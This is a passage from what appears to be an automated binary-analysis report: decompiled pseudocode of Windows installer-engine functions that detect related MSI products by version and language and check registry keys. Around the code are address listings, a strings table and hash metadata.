									_t180 = _v136 + 1;
									__eflags = _t180;
									_push( &_v88);
									_push(_t180);
									_push( *_t261);
									_v136 = _t180;
									continue;
								}
								_t262 = E00435361(_t242,  &_v88, _t256, 2, L"VersionString",  &_v92);
								__eflags = _t262 - 0x80070645;
								if(_t262 == 0x80070645) {
									L29:
									_push( &_v92);
									_push(L"VersionString");
									_t185 = 4;
									_push(_t185);
									_push(_t256);
									_push( &_v88);
									_t259 = E00435361(_t242);
									__eflags = _t259 - 0x80070645;
									if(_t259 == 0x80070645) {
										goto L72;
									}
									__eflags = _t259 - 0x80070648;
									if(_t259 == 0x80070648) {
										goto L72;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_push( &_v88);
										_push("Failed to get version for product in machine context: %ls");
										L93:
										_push(_t259);
										E00430A57();
										goto L106;
									}
									_v96 = 1;
									L33:
									_t259 = E0043720F(_t252, _v92, _t256,  &_v132);
									__eflags = _t259;
									if(_t259 < 0) {
										_push( &_v88);
										L91:
										E00430A57(_t259, "Failed to convert version: %ls to DWORD64 for ProductCode: %ls", _v92);
										goto L106;
									}
									_t261 = _v100;
									_t243 = _v132;
									_t194 = _v128;
									__eflags =  *((intOrPtr*)(_t261 + 0x18)) - _t256;
									if( *((intOrPtr*)(_t261 + 0x18)) == _t256) {
										L43:
										__eflags =  *((intOrPtr*)(_t261 + 0x1c)) - _t256;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t256) {
											L52:
											_v124 = _t256;
											__eflags =  *((intOrPtr*)(_t261 + 0x34)) - _t256;
											if( *((intOrPtr*)(_t261 + 0x34)) == _t256) {
												L65:
												__eflags =  *((intOrPtr*)(_t261 + 0x28)) - _t256;
												if( *((intOrPtr*)(_t261 + 0x28)) == _t256) {
													_t263 = 3;
												} else {
													__eflags =  *(_t232 + 0x40) - 2;
													if( *(_t232 + 0x40) != 2) {
														_t263 = _t256;
													} else {
														_t263 = 1;
														 *(_t232 + 0x40) = 1;
													}
												}
												E00402003(2, 0x20000067,  &_v88);
												_t268 = _t268 + 0x1c;
												_t201 =  *((intOrPtr*)(_v104 + 0x10));
												_t252 =  &_v88;
												_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t201 + 0x30))(_t201,  *_t232,  &_v88, _v96, _v132, _v128, _t263, E0040E7BB(_v96), E0040EA3E(_v132, _v128), _v124, E0040E7D3(_t263)));
												__eflags = _t259;
												if(_t259 < 0) {
													_push(_t259);
													_push(0x23a);
													L15:
													_push("msiengine.cpp");
													E004300D9(_t203);
													_push("UX aborted detect related MSI package.");
													goto L105;
												} else {
													goto L72;
												}
											}
											__eflags = _v96 - _t256;
											_push( &_v108);
											_push(L"Language");
											_t208 = 2;
											_t245 = 4;
											_t209 =  !=  ? _t245 : _t208;
											_push( !=  ? _t245 : _t208);
											_push(_t256);
											_push( &_v88);
											__eflags = E00435361(_t245);
											if(__eflags < 0) {
												L68:
												E004309F9(_t252, __eflags, _t211, 0xe0000098, _t256,  &_v88, _v108, _t256);
												goto L73;
											}
											__eflags = E004346E9(_t245, _t252, _v108, _t256,  &_v124);
											if(__eflags < 0) {
												goto L68;
											}
											_t247 = _t256;
											_t252 = _t256;
											__eflags =  *((intOrPtr*)(_t261 + 0x34)) - _t247;
											if( *((intOrPtr*)(_t261 + 0x34)) <= _t247) {
												L61:
												_t214 =  *(_t261 + 0x2c);
												__eflags = _t214;
												if(_t214 == 0) {
													L64:
													__eflags = _t252;
													if(_t252 != 0) {
														goto L73;
													}
													goto L65;
												}
												__eflags = _t252;
												if(_t252 == 0) {
													goto L73;
												}
												__eflags = _t214;
												if(_t214 != 0) {
													goto L65;
												}
												goto L64;
											}
											_t215 =  *((intOrPtr*)(_t261 + 0x30));
											while(1) {
												__eflags = _v124 -  *_t215;
												_t261 = _v100;
												if(_v124 ==  *_t215) {
													break;
												}
												_t247 = _t247 + 1;
												_t215 = _t215 + 4;
												__eflags = _t247 -  *((intOrPtr*)(_t261 + 0x34));
												if(_t247 <  *((intOrPtr*)(_t261 + 0x34))) {
													continue;
												}
												goto L61;
											}
											_t252 = 1;
											__eflags = 1;
											goto L61;
										}
										__eflags =  *((intOrPtr*)(_t261 + 0x24)) - _t256;
										if( *((intOrPtr*)(_t261 + 0x24)) == _t256) {
											__eflags = _t194 -  *((intOrPtr*)(_t261 + 0x14));
											if(__eflags > 0) {
												goto L73;
											}
											if(__eflags < 0) {
												goto L52;
											}
											__eflags = _t243 -  *((intOrPtr*)(_t261 + 0x10));
											if(_t243 >=  *((intOrPtr*)(_t261 + 0x10))) {
												goto L73;
											}
											goto L52;
										}
										__eflags = _t194 -  *((intOrPtr*)(_t261 + 0x14));
										if(__eflags > 0) {
											goto L73;
										}
										if(__eflags < 0) {
											goto L52;
										}
										__eflags = _t243 -  *((intOrPtr*)(_t261 + 0x10));
										if(_t243 >  *((intOrPtr*)(_t261 + 0x10))) {
											goto L73;
										}
										goto L52;
									}
									__eflags =  *((intOrPtr*)(_t261 + 0x20)) - _t256;
									if( *((intOrPtr*)(_t261 + 0x20)) == _t256) {
										__eflags = _t194 -  *((intOrPtr*)(_t261 + 0xc));
										if(__eflags < 0) {
											goto L73;
										}
										if(__eflags > 0) {
											goto L43;
										}
										__eflags = _t243 -  *((intOrPtr*)(_t261 + 8));
										if(_t243 <=  *((intOrPtr*)(_t261 + 8))) {
											goto L73;
										}
										goto L43;
									}
									__eflags = _t194 -  *((intOrPtr*)(_t261 + 0xc));
									if(__eflags < 0) {
										goto L73;
									}
									if(__eflags > 0) {
										goto L43;
									}
									__eflags = _t243 -  *((intOrPtr*)(_t261 + 8));
									if(_t243 <  *((intOrPtr*)(_t261 + 8))) {
										goto L73;
									}
									goto L43;
								}
								__eflags = _t262 - 0x80070648;
								if(_t262 == 0x80070648) {
									goto L29;
								}
								__eflags = _t262;
								if(_t262 < 0) {
									_push( &_v88);
									_push("Failed to get version for product in user unmanaged context: %ls");
									goto L93;
								}
								_v96 = _t256;
								goto L33;
							}
							L75:
							_t218 = _v116 + 1;
							_t241 = _v112 + 0x38;
							_t259 = _t256;
							_v116 = _t218;
							_v112 = _t241;
							__eflags = _t218 -  *((intOrPtr*)(_t232 + 0xc0));
						} while (_t218 <  *((intOrPtr*)(_t232 + 0xc0)));
						goto L76;
					}
					__eflags = _t258 - 0x80070648;
					if(_t258 == 0x80070648) {
						goto L19;
					}
					_push( *(_t232 + 0x90));
					_push("Failed to get product information for ProductCode: %ls");
					goto L93;
				}
				_t15 = _t232 + 0xa0; // 0x158
				_t220 = E0043720F(_t252, _v92, 0, _t15);
				_t259 = _t220;
				if(_t220 >= 0) {
					_t252 =  *(_t232 + 0x98);
					_t19 = _t232 + 0xa0; // 0x158
					_t221 = _t19;
					_t249 =  *_t221;
					_t222 =  *((intOrPtr*)(_t221 + 4));
					__eflags =  *((intOrPtr*)(_t232 + 0x9c)) - _t222;
					if(__eflags > 0) {
						L10:
						_t223 = 2;
						_v96 = _t223;
						L12:
						_t250 = 4;
						 *(_t232 + 0x40) = _t250;
						__eflags = _t223;
						if(_t223 == 0) {
							goto L20;
						}
						L13:
						_t28 = _t232 + 0xa0; // 0x158
						_t265 = _t28;
						E00402003(2, 0x20000067,  *(_t232 + 0x90));
						_t252 = _v96;
						_t268 = _t268 + 0x1c;
						_t229 =  *((intOrPtr*)(_v104 + 0x10));
						_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t229 + 0x30))(_t229,  *_t232,  *(_t232 + 0x90),  *((intOrPtr*)(_t232 + 0x14)),  *_t265,  *((intOrPtr*)(_t265 + 4)), _v96, E0040E7BB( *((intOrPtr*)(_t232 + 0x14))), E0040EA3E( *_t265,  *((intOrPtr*)(_t265 + 4))),  *((intOrPtr*)(_t232 + 0x94)), E0040E7D3(_t223)));
						__eflags = _t259;
						if(_t259 >= 0) {
							goto L20;
						}
						_push(_t259);
						_push(0x1b5);
						goto L15;
					}
					if(__eflags < 0) {
						L6:
						_t223 = 1;
						_v96 = 1;
						 *(_t232 + 0x40) = 5;
						goto L13;
					}
					__eflags = _t252 - _t249;
					if(_t252 >= _t249) {
						__eflags =  *((intOrPtr*)(_t232 + 0x9c)) - _t222;
						if(__eflags < 0) {
							L11:
							_t223 = _t256;
							goto L12;
						}
						if(__eflags > 0) {
							goto L10;
						}
						__eflags = _t252 - _t249;
						if(_t252 <= _t249) {
							goto L11;
						}
						goto L10;
					}
					goto L6;
				}
				_push( *(_t232 + 0x90));
				goto L91;
			}































































                                                                                                                                                                  0x0041ad2a
                                                                                                                                                                  0x0041ad33
                                                                                                                                                                  0x0041ad3a
                                                                                                                                                                  0x0041ad40
                                                                                                                                                                  0x0041ad45
                                                                                                                                                                  0x0041ad4a
                                                                                                                                                                  0x0041ad4c
                                                                                                                                                                  0x0041ad4e
                                                                                                                                                                  0x0041ad54
                                                                                                                                                                  0x0041ad55
                                                                                                                                                                  0x0041ad56
                                                                                                                                                                  0x0041ad59
                                                                                                                                                                  0x0041ad5c
                                                                                                                                                                  0x0041ad5f
                                                                                                                                                                  0x0041ad64
                                                                                                                                                                  0x0041ad6d
                                                                                                                                                                  0x0041ad6e
                                                                                                                                                                  0x0041ad75
                                                                                                                                                                  0x0041ad78
                                                                                                                                                                  0x0041ad79
                                                                                                                                                                  0x0041ad7c
                                                                                                                                                                  0x0041ad7d
                                                                                                                                                                  0x0041ad7e
                                                                                                                                                                  0x0041ad84
                                                                                                                                                                  0x0041ad87
                                                                                                                                                                  0x0041ad8c
                                                                                                                                                                  0x0041ad94
                                                                                                                                                                  0x0041ad98
                                                                                                                                                                  0x0041ae9a
                                                                                                                                                                  0x0041aea0
                                                                                                                                                                  0x0041aeba
                                                                                                                                                                  0x0041aeba
                                                                                                                                                                  0x0041aec1
                                                                                                                                                                  0x0041aec3
                                                                                                                                                                  0x0041aec3
                                                                                                                                                                  0x0041aec6
                                                                                                                                                                  0x0041aecc
                                                                                                                                                                  0x0041b171
                                                                                                                                                                  0x0041b177
                                                                                                                                                                  0x0041b179
                                                                                                                                                                  0x0041b2cb
                                                                                                                                                                  0x0041b2cf
                                                                                                                                                                  0x0041b2d4
                                                                                                                                                                  0x0041b2d4
                                                                                                                                                                  0x0041b2dd
                                                                                                                                                                  0x0041b2e2
                                                                                                                                                                  0x0041b2e2
                                                                                                                                                                  0x0041b2f7
                                                                                                                                                                  0x0041b2f7
                                                                                                                                                                  0x0041b17f
                                                                                                                                                                  0x0041b181
                                                                                                                                                                  0x0041b184
                                                                                                                                                                  0x0041b18c
                                                                                                                                                                  0x0041b18e
                                                                                                                                                                  0x0041b18f
                                                                                                                                                                  0x0041b192
                                                                                                                                                                  0x0041b195
                                                                                                                                                                  0x0041b232
                                                                                                                                                                  0x0041b233
                                                                                                                                                                  0x0041b1ca
                                                                                                                                                                  0x0041b1ca
                                                                                                                                                                  0x0041b1ca
                                                                                                                                                                  0x0041b1cb
                                                                                                                                                                  0x0041b24a
                                                                                                                                                                  0x0041b251
                                                                                                                                                                  0x0041b259
                                                                                                                                                                  0x0041b26d
                                                                                                                                                                  0x0041b26f
                                                                                                                                                                  0x0041b271
                                                                                                                                                                  0x0041b2b9
                                                                                                                                                                  0x0041b2be
                                                                                                                                                                  0x0041b2c3
                                                                                                                                                                  0x0041b2c3
                                                                                                                                                                  0x0041b2c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b2ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b271
                                                                                                                                                                  0x0041b1cd
                                                                                                                                                                  0x0041b1cd
                                                                                                                                                                  0x0041b1ce
                                                                                                                                                                  0x0041b241
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b241
                                                                                                                                                                  0x0041b1d0
                                                                                                                                                                  0x0041b1d0
                                                                                                                                                                  0x0041b1d1
                                                                                                                                                                  0x0041b238
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b238
                                                                                                                                                                  0x0041b1d3
                                                                                                                                                                  0x0041b1d3
                                                                                                                                                                  0x0041b1d4
                                                                                                                                                                  0x0041b292
                                                                                                                                                                  0x0041b2a2
                                                                                                                                                                  0x0041b2a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b2a7
                                                                                                                                                                  0x0041b1da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b1da
                                                                                                                                                                  0x0041b1ac
                                                                                                                                                                  0x0041b1ae
                                                                                                                                                                  0x0041b1b0
                                                                                                                                                                  0x0041b28b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b28b
                                                                                                                                                                  0x0041b1b6
                                                                                                                                                                  0x0041b1b9
                                                                                                                                                                  0x0041b1bc
                                                                                                                                                                  0x0041b1bf
                                                                                                                                                                  0x0041b1c3
                                                                                                                                                                  0x0041b1c4
                                                                                                                                                                  0x0041b1c4
                                                                                                                                                                  0x0041b1c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b273
                                                                                                                                                                  0x0041b276
                                                                                                                                                                  0x0041b277
                                                                                                                                                                  0x0041b27a
                                                                                                                                                                  0x0041b27d
                                                                                                                                                                  0x0041b27d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b289
                                                                                                                                                                  0x0041aed2
                                                                                                                                                                  0x0041aed4
                                                                                                                                                                  0x0041aed7
                                                                                                                                                                  0x0041aedd
                                                                                                                                                                  0x0041aedf
                                                                                                                                                                  0x0041aee2
                                                                                                                                                                  0x0041aee3
                                                                                                                                                                  0x0041aee4
                                                                                                                                                                  0x0041aee6
                                                                                                                                                                  0x0041aee9
                                                                                                                                                                  0x0041b140
                                                                                                                                                                  0x0041b145
                                                                                                                                                                  0x0041b147
                                                                                                                                                                  0x0041b14d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aef4
                                                                                                                                                                  0x0041aef6
                                                                                                                                                                  0x0041b226
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b226
                                                                                                                                                                  0x0041af0d
                                                                                                                                                                  0x0041af13
                                                                                                                                                                  0x0041af16
                                                                                                                                                                  0x0041b129
                                                                                                                                                                  0x0041b129
                                                                                                                                                                  0x0041b12c
                                                                                                                                                                  0x0041b132
                                                                                                                                                                  0x0041b135
                                                                                                                                                                  0x0041b135
                                                                                                                                                                  0x0041b136
                                                                                                                                                                  0x0041b137
                                                                                                                                                                  0x0041b138
                                                                                                                                                                  0x0041b13a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b13a
                                                                                                                                                                  0x0041af31
                                                                                                                                                                  0x0041af33
                                                                                                                                                                  0x0041af39
                                                                                                                                                                  0x0041af50
                                                                                                                                                                  0x0041af53
                                                                                                                                                                  0x0041af54
                                                                                                                                                                  0x0041af5b
                                                                                                                                                                  0x0041af5c
                                                                                                                                                                  0x0041af5d
                                                                                                                                                                  0x0041af61
                                                                                                                                                                  0x0041af67
                                                                                                                                                                  0x0041af69
                                                                                                                                                                  0x0041af6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041af75
                                                                                                                                                                  0x0041af7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041af81
                                                                                                                                                                  0x0041af83
                                                                                                                                                                  0x0041b212
                                                                                                                                                                  0x0041b213
                                                                                                                                                                  0x0041b218
                                                                                                                                                                  0x0041b218
                                                                                                                                                                  0x0041b219
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b21e
                                                                                                                                                                  0x0041af89
                                                                                                                                                                  0x0041af90
                                                                                                                                                                  0x0041af9d
                                                                                                                                                                  0x0041af9f
                                                                                                                                                                  0x0041afa1
                                                                                                                                                                  0x0041b1f8
                                                                                                                                                                  0x0041b1f9
                                                                                                                                                                  0x0041b202
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b207
                                                                                                                                                                  0x0041afa7
                                                                                                                                                                  0x0041afaa
                                                                                                                                                                  0x0041afad
                                                                                                                                                                  0x0041afb0
                                                                                                                                                                  0x0041afb3
                                                                                                                                                                  0x0041afe4
                                                                                                                                                                  0x0041afe4
                                                                                                                                                                  0x0041afe7
                                                                                                                                                                  0x0041b018
                                                                                                                                                                  0x0041b018
                                                                                                                                                                  0x0041b01b
                                                                                                                                                                  0x0041b01e
                                                                                                                                                                  0x0041b094
                                                                                                                                                                  0x0041b094
                                                                                                                                                                  0x0041b097
                                                                                                                                                                  0x0041b0c5
                                                                                                                                                                  0x0041b099
                                                                                                                                                                  0x0041b099
                                                                                                                                                                  0x0041b09d
                                                                                                                                                                  0x0041b0bf
                                                                                                                                                                  0x0041b09f
                                                                                                                                                                  0x0041b0a2
                                                                                                                                                                  0x0041b0a4
                                                                                                                                                                  0x0041b0a4
                                                                                                                                                                  0x0041b09d
                                                                                                                                                                  0x0041b0f0
                                                                                                                                                                  0x0041b0f8
                                                                                                                                                                  0x0041b0fb
                                                                                                                                                                  0x0041b107
                                                                                                                                                                  0x0041b11f
                                                                                                                                                                  0x0041b121
                                                                                                                                                                  0x0041b123
                                                                                                                                                                  0x0041b1ea
                                                                                                                                                                  0x0041b1eb
                                                                                                                                                                  0x0041ae86
                                                                                                                                                                  0x0041ae86
                                                                                                                                                                  0x0041ae8b
                                                                                                                                                                  0x0041ae90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b123
                                                                                                                                                                  0x0041b020
                                                                                                                                                                  0x0041b026
                                                                                                                                                                  0x0041b027
                                                                                                                                                                  0x0041b02e
                                                                                                                                                                  0x0041b031
                                                                                                                                                                  0x0041b032
                                                                                                                                                                  0x0041b035
                                                                                                                                                                  0x0041b036
                                                                                                                                                                  0x0041b03a
                                                                                                                                                                  0x0041b040
                                                                                                                                                                  0x0041b042
                                                                                                                                                                  0x0041b0a9
                                                                                                                                                                  0x0041b0b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b0b8
                                                                                                                                                                  0x0041b051
                                                                                                                                                                  0x0041b053
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b055
                                                                                                                                                                  0x0041b057
                                                                                                                                                                  0x0041b059
                                                                                                                                                                  0x0041b05c
                                                                                                                                                                  0x0041b079
                                                                                                                                                                  0x0041b079
                                                                                                                                                                  0x0041b07c
                                                                                                                                                                  0x0041b07e
                                                                                                                                                                  0x0041b08c
                                                                                                                                                                  0x0041b08c
                                                                                                                                                                  0x0041b08e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b08e
                                                                                                                                                                  0x0041b080
                                                                                                                                                                  0x0041b082
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b088
                                                                                                                                                                  0x0041b08a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b08a
                                                                                                                                                                  0x0041b05e
                                                                                                                                                                  0x0041b061
                                                                                                                                                                  0x0041b064
                                                                                                                                                                  0x0041b066
                                                                                                                                                                  0x0041b069
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b06b
                                                                                                                                                                  0x0041b06c
                                                                                                                                                                  0x0041b06f
                                                                                                                                                                  0x0041b072
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b074
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x0041afe9
                                                                                                                                                                  0x0041afec
                                                                                                                                                                  0x0041b004
                                                                                                                                                                  0x0041b007
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b00d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b00f
                                                                                                                                                                  0x0041b012
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b012
                                                                                                                                                                  0x0041afee
                                                                                                                                                                  0x0041aff1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aff7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aff9
                                                                                                                                                                  0x0041affc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b002
                                                                                                                                                                  0x0041afb5
                                                                                                                                                                  0x0041afb8
                                                                                                                                                                  0x0041afd0
                                                                                                                                                                  0x0041afd3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afd9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afdb
                                                                                                                                                                  0x0041afde
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afde
                                                                                                                                                                  0x0041afba
                                                                                                                                                                  0x0041afbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afc3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afc5
                                                                                                                                                                  0x0041afc8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afce
                                                                                                                                                                  0x0041af3b
                                                                                                                                                                  0x0041af41
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041af43
                                                                                                                                                                  0x0041af45
                                                                                                                                                                  0x0041b1e2
                                                                                                                                                                  0x0041b1e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b1e3
                                                                                                                                                                  0x0041af4b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041af4b
                                                                                                                                                                  0x0041b153
                                                                                                                                                                  0x0041b159
                                                                                                                                                                  0x0041b15a
                                                                                                                                                                  0x0041b15d
                                                                                                                                                                  0x0041b15f
                                                                                                                                                                  0x0041b162
                                                                                                                                                                  0x0041b165
                                                                                                                                                                  0x0041b165
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aed7
                                                                                                                                                                  0x0041aea2
                                                                                                                                                                  0x0041aea8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aeaa
                                                                                                                                                                  0x0041aeb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aeb0
                                                                                                                                                                  0x0041ad9e
                                                                                                                                                                  0x0041ada9
                                                                                                                                                                  0x0041adae
                                                                                                                                                                  0x0041adb2
                                                                                                                                                                  0x0041adbf
                                                                                                                                                                  0x0041adc5
                                                                                                                                                                  0x0041adc5
                                                                                                                                                                  0x0041adcb
                                                                                                                                                                  0x0041adcd
                                                                                                                                                                  0x0041add0
                                                                                                                                                                  0x0041add6
                                                                                                                                                                  0x0041adfb
                                                                                                                                                                  0x0041adfd
                                                                                                                                                                  0x0041adfe
                                                                                                                                                                  0x0041ae05
                                                                                                                                                                  0x0041ae07
                                                                                                                                                                  0x0041ae08
                                                                                                                                                                  0x0041ae0b
                                                                                                                                                                  0x0041ae0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ae13
                                                                                                                                                                  0x0041ae20
                                                                                                                                                                  0x0041ae20
                                                                                                                                                                  0x0041ae47
                                                                                                                                                                  0x0041ae4c
                                                                                                                                                                  0x0041ae52
                                                                                                                                                                  0x0041ae55
                                                                                                                                                                  0x0041ae7a
                                                                                                                                                                  0x0041ae7c
                                                                                                                                                                  0x0041ae7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ae80
                                                                                                                                                                  0x0041ae81
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ae81
                                                                                                                                                                  0x0041add8
                                                                                                                                                                  0x0041adde
                                                                                                                                                                  0x0041ade0
                                                                                                                                                                  0x0041ade1
                                                                                                                                                                  0x0041ade4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ade4
                                                                                                                                                                  0x0041adda
                                                                                                                                                                  0x0041addc
                                                                                                                                                                  0x0041aded
                                                                                                                                                                  0x0041adf3
                                                                                                                                                                  0x0041ae03
                                                                                                                                                                  0x0041ae03
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041ae03
                                                                                                                                                                  0x0041adf5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041adf7
                                                                                                                                                                  0x0041adf9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041adf9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041addc
                                                                                                                                                                  0x0041adb4
                                                                                                                                                                  0x00000000

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get version for product in machine context: %ls, xrefs: 0041B213
                                                                                                                                                                  • msiengine.cpp, xrefs: 0041AE86, 0041B29D, 0041B2B4
                                                                                                                                                                  • Language, xrefs: 0041B027
                                                                                                                                                                  • Failed to query feature state., xrefs: 0041B28B
                                                                                                                                                                  • Invalid state value., xrefs: 0041B2A7
                                                                                                                                                                  • UX aborted detect., xrefs: 0041B2BE
                                                                                                                                                                  • VersionString, xrefs: 0041AD6E, 0041AF20, 0041AF54
                                                                                                                                                                  • Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 0041B1FC
                                                                                                                                                                  • Failed to get version for product in user unmanaged context: %ls, xrefs: 0041B1E3
                                                                                                                                                                  • Failed to enum related products., xrefs: 0041B226
                                                                                                                                                                  • UX aborted detect related MSI package., xrefs: 0041AE90
                                                                                                                                                                  • Failed to get product information for ProductCode: %ls, xrefs: 0041AEB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msiengine.cpp
                                                                                                                                                                  • API String ID: 1659193697-1711659797
                                                                                                                                                                  • Opcode ID: 3c9a20a6af060f4f4e3647fcb001ab4524b3d1ecd76251296628347b466acc1a
                                                                                                                                                                  • Instruction ID: d8e3f27c74d760661e4357b4dae28699aeba8221b776db2d1bcf8fcb14407412
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c9a20a6af060f4f4e3647fcb001ab4524b3d1ecd76251296628347b466acc1a
                                                                                                                                                                  • Instruction Fuzzy Hash: EE02CD31D00214AFDB219FA5CC85EEEBBB5FF48300F24416BE905AB255D7389985CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406286, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 143registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                                                  			E00406286(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				signed short _t53;
				intOrPtr _t57;
				signed short _t62;
				void* _t67;
				void* _t69;
				void* _t73;

				_t57 = _a4;
				_t67 = 1;
				_t35 =  !=  ? 0x101 : 1;
				_a4 =  !=  ? 0x101 : 1;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				if(E00403A92(_a8,  *((intOrPtr*)(_t57 + 0x1c)),  &_v8, 0) >= 0) {
					_t69 = E004324D5( *((intOrPtr*)(_t57 + 0x18)), _v8, _a4,  &_v16);
					if(_t69 < 0) {
						_push(_v8);
						if(_t69 != 0x80070002) {
							_push("Failed to open registry key. Key = \'%ls\'");
							_push(_t69);
							E00430A57();
							_t73 = _t73 + 0xc;
							L18:
							if(_t69 < 0) {
								_push(_t69);
								E00430F28(2, "RegistrySearchExists failed: ID \'%ls\', HRESULT 0x%x", _v8);
							}
							L20:
							if(_v8 != 0) {
								E004380AB(_v8);
							}
							if(_v12 != 0) {
								E004380AB(_v12);
							}
							if(_v16 != 0) {
								RegCloseKey(_v16);
							}
							return _t69;
						}
						_push("Registry key not found. Key = \'%ls\'");
						_push(2);
						E00430F28();
						_t73 = _t73 + 0xc;
						L14:
						_t67 = 0;
						L15:
						asm("cdq");
						_t69 = E004045DF(_a8,  *((intOrPtr*)(_t57 + 4)), _t67, 0, 0);
						if(_t69 >= 0) {
							goto L20;
						}
